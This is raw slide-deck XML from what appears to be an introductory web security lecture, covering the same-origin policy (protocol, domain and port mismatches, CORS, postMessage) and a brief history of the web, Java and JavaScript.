                      <a:endParaRPr sz="1000"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="120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6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>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554" name="Google Shape;554;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369450" y="2982525"/>
            <a:ext cx="3133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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488250" y="2982525"/>
            <a:ext cx="30000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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https</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lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564750" y="28748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Protocol mismatch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ≠ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369450" y="3604725"/>
            <a:ext cx="30000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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</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sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Google Shape;558;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3427900" y="3593308"/>
            <a:ext cx="3076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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>charlotte.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Google Shape;559;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564750" y="3493025"/>
            <a:ext cx="2407500" cy="661689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain mismatch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>charlotte.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:ea typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≠ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cci.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>charlotte.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426375" y="4226925"/>
            <a:ext cx="3076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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cci.charlotte.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Google Shape;561;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3407425" y="4227015"/>
            <a:ext cx="32898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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</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r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Google Shape;562;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563800" y="41231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Port mismatch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ≠ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>8000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68" name="Google Shape;568;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Two websites with different origins cannot interact with each other</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> embeds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, the inner frame cannot interact with the outer frame, and the outer frame cannot interact with the inner-frame</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Exception: JavaScript runs with the origin of the page that loads it</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> fetches JavaScript from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, the JavaScript has the origin of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:endParaRPr lang="en" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> has “copy-pasted” JavaScript onto its webpage</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Exception: Websites can fetch and display images from other origins</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>However, the website only knows about the image’s size and dimensions (cannot actually manipulate the image)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Exception: Websites can agree to allow some limited sharing</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Cross-origin resource sharing (CORS)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> function in JavaScript</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;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 Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;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576" name="Google Shape;57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Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;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583" name="Google Shape;583;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History of the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;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web was not designed with security from the start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Historical design decisions can help us understand where modern security vulnerabilities originated</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;11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Webpage: Summary</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;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590" name="Google Shape;59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Same-Origin Policy: Summary</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;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597" name="Google Shape;597;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1.0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;13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40" name="Google Shape;14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Web 1.0: The first era of websites (roughly 1991-2004)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Websites only contained static content</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Documents with texts, images, etc.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>No interactive features</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>1996: Sun Microsystems releases Java</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Java: A programming language designed to compile to an intermediate representation and run on a lot of systems</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Sun Microsystems built a web browser that can fetch and execute Java code</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Problem: Java was too powerful</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Java was designed to do everything a locally running program could do</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security vulnerabilities associated with downloading and running code from others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>A new language called JavaScript was created</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>The only things JavaScript and Java share are the name and some parts of the syntax</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Web?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;14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p28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="152" idx="3"/>
            <a:endCxn id="153" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221263" y="4036375"/>
            <a:ext cx="4283400" cy="336000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;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Web?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Google Shape;15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6" name="Google Shape;156;p28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="85206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Web (World Wide Web)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A collection of data and services </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Data and services are provided by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>web servers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Data and services are accessed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>web browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (e.g. Chrome, Firefox)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The web is not the Internet</a:t>
            </a:r>
